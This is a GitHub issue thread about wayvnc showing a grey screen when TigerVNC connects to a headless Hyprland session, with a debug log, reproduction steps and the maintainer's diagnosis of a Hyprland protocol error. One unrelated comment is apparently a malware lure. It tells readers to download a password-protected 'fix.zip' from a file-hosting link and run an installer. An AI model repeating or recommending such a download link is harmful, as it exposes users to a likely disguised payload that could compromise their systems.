### ISSUE TITLE
got grey blank screen when streaming Hyprland Headless display

### ISSUE THREAD

**Issue by J4ckTh3R1pper** [any1/wayvnc#326]
Client is TigerVNC, I got grey blank screen when connected to wayvnc

### Useful information:
Please, try to gather as much of useful information as possible and follow
these instructions:

- **Version:**
  - wayvnc: 0.8.0
  - neatvnc: 0.8.0
  - aml: 0.3.0

- Try to reproduce while capturing a **trace log:**
```
Info: Capturing output HEADLESS-2 
Info: >> Headless output 2 1920x1080+0x0 Power:ON
DEBUG: ../neatvnc-0.8.0/src/server.c: 1908: Trying address: 0.0.0.0
DEBUG: ../neatvnc-0.8.0/src/server.c: 1928: Successfully bound to address
Info: Listening for connections on 0.0.0.0:5900
DEBUG: ../wayvnc-0.8.0/src/ctl-server.c: 808: Initializing wayvncctl socket: /run/user/1000/wayvncctl
Info: New client connection from 192.168.5.14: 0x55f461c6d8c0 (ref 1)
DEBUG: ../neatvnc-0.8.0/src/server.c: 799: Client chose security type: 1
Info: Starting screen capture
DEBUG: ../wayvnc-0.8.0/src/main.c: 1337: Client connected, new client count:1
DEBUG: ../wayvnc-0.8.0/src/ctl-server.c: 940: Enqueueing client-connected event: {"id":"1","address":"192.168.5.14","username":null,"seat":"Hyprland","connection_count":1}                                                            DEBUG: ../wayvnc-0.8.0/src/ctl-server.c: 967: Enqueued client-connected event for 0 clients
DEBUG: ../neatvnc-0.8.0/src/server.c: 1048: Client 0x55f461c6d8c0 set encodings: cursor,desktop-size,extended-desktop-size,qemu-extended-key-event,tight,copyrect,open-h264,zrle,hextile,rre,copyrect,raw
DEBUG: ../wayvnc-0.8.0/src/main.c: 799: Client resolution changed: 1920x1008, capturing output HEADLESS-2 which is headless: yes
zwlr_output_configuration_head_v1@24: error 3: Invalid mode
ERROR: ../wayvnc-0.8.0/src/main.c: 503: Failed to dispatch pending
DEBUG: ../wayvnc-0.8.0/src/ctl-server.c: 940: Enqueueing detached event: {} 
DEBUG: ../wayvnc-0.8.0/src/ctl-server.c: 967: Enqueued detached event for 0 clients
Info: Choosing tight encoding for client 0x55f461c6d8c0
```

- Describe how to **reproduce** the problem
  -  Start headless hyprland session via SSH with command
      `WLR_BACKENDS=headless WLR_LIBINPUT_NO_DEVICES=1 Hyprland`
  -  Start wayvnc via SSH with command
      `wayvnc --log-level=debug 0.0.0.0`
  -  Connect to VNC server using TigerVNC

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by any1** [comment]
Looks like hyprland raises a protocol error when wayvnc tries to resize the headless output. This should not be a protocol error and this is your problem.

**Comment by J4ckTh3R1pper** [comment]
i switched to TightVNC client and it works fine now, strange

**Comment by any1** [comment]
No, it isn't strange at all. TightVNC doesn't support client-side resizing, so it's not going to trigger this error.

**Comment by J4ckTh3R1pper** [comment]
> No, it isn't strange at all. TightVNC doesn't support client-side resizing, so it's not going to trigger this error.

So what am I supposed to do to prevent TigerVNC from resizing the WM?

**Comment by any1** [comment]
> > No, it isn't strange at all. TightVNC doesn't support client-side resizing, so it's not going to trigger this error.
> 
> So what am I supposed to do to prevent TigerVNC from resizing the WM?

This is a hyprland bug, not a TigerVNC bug or a wayvnc bug.
